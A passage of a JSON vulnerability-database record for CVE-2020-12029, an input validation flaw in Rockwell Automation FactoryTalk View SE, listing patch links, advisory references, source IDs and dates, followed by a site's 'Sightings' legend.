"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.rockwellautomation.com/en-us.html"
},
{
"title": "Rockwell Automation has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
},
{
"title": "Patch for Rockwell Automation FactoryTalk View SE Input Verification Error Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/225399"
},
{
"title": "Rockwell Automation FactoryTalk View SE Enter the fix for the verification error vulnerability",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=124853"
},
{
"title": "Check Point Security Alerts: Rockwell Automation FactoryTalk View Remote Code Execution (CVE-2020-12029)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=check_point_security_alerts\u0026qid=14d703dfb95345fc9466389ccd1c348a"
},
{
"title": "Exploits and Advisories\nCVEs\nExploits",
"trust": 0.1,
"url": "https://github.com/rdomanski/Exploits_and_Advisories "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-20-730"
},
{
"db": "CNVD",
"id": "CNVD-2020-38691"
},
{
"db": "VULMON",
"id": "CVE-2020-12029"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008257"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1224"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164666"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008257"
},
{
"db": "NVD",
"id": "CVE-2020-12029"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
},
{
"trust": 2.5,
"url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/160156/rockwell-factorytalk-view-se-scada-unauthenticated-remote-code-execution.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12029"
},
{
"trust": 1.2,
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-170-05"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12029"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97172119/index.html"
},
{
"trust": 0.6,
"url": "https://www.zerodayinitiative.com/advisories/zdi-20-730/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/47659"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/20.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://advisories.checkpoint.com/defense/advisories/public/2023/cpai-2020-4079.html"
},
{
"trust": 0.1,
"url": "https://github.com/rdomanski/exploits_and_advisories"
},
{
"trust": 0.1,
"url": "https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami\u0027],"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12027"
},
{
"trust": 0.1,
"url": "https://github.com/pedrib/poc/blob/master/advisories/pwn2own/miami_2020/replicant/replicant.md\u0027],"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "http://\u0027"
},
{
"trust": 0.1,
"url": "https://github.com/rdomanski/exploits_and_advisories/tree/master/advisories/pwn2own/miami2020/replicant.md\u0027],"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12028"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-20-730"
},
{
"db": "CNVD",
"id": "CNVD-2020-38691"
},
{
"db": "VULHUB",
"id": "VHN-164666"
},
{
"db": "VULMON",
"id": "CVE-2020-12029"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008257"
},
{
"db": "PACKETSTORM",
"id": "160156"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1224"
},
{
"db": "NVD",
"id": "CVE-2020-12029"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-20-730"
},
{
"db": "CNVD",
"id": "CNVD-2020-38691"
},
{
"db": "VULHUB",
"id": "VHN-164666"
},
{
"db": "VULMON",
"id": "CVE-2020-12029"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008257"
},
{
"db": "PACKETSTORM",
"id": "160156"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1224"
},
{
"db": "NVD",
"id": "CVE-2020-12029"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-22T00:00:00",
"db": "ZDI",
"id": "ZDI-20-730"
},
{
"date": "2020-07-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-38691"
},
{
"date": "2020-07-20T00:00:00",
"db": "VULHUB",
"id": "VHN-164666"
},
{
"date": "2020-07-20T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12029"
},
{
"date": "2020-09-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-008257"
},
{
"date": "2020-11-20T15:46:41",
"db": "PACKETSTORM",
"id": "160156"
},
{
"date": "2020-06-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-1224"
},
{
"date": "2020-07-20T15:15:11.477000",
"db": "NVD",
"id": "CVE-2020-12029"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-22T00:00:00",
"db": "ZDI",
"id": "ZDI-20-730"
},
{
"date": "2020-07-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-38691"
},
{
"date": "2022-01-04T00:00:00",
"db": "VULHUB",
"id": "VHN-164666"
},
{
"date": "2022-01-04T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12029"
},
{
"date": "2020-09-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-008257"
},
{
"date": "2020-11-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-1224"
},
{
"date": "2024-11-21T04:59:08.690000",
"db": "NVD",
"id": "CVE-2020-12029"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-1224"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FactoryTalk View SE Vulnerability regarding input verification in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008257"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-1224"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.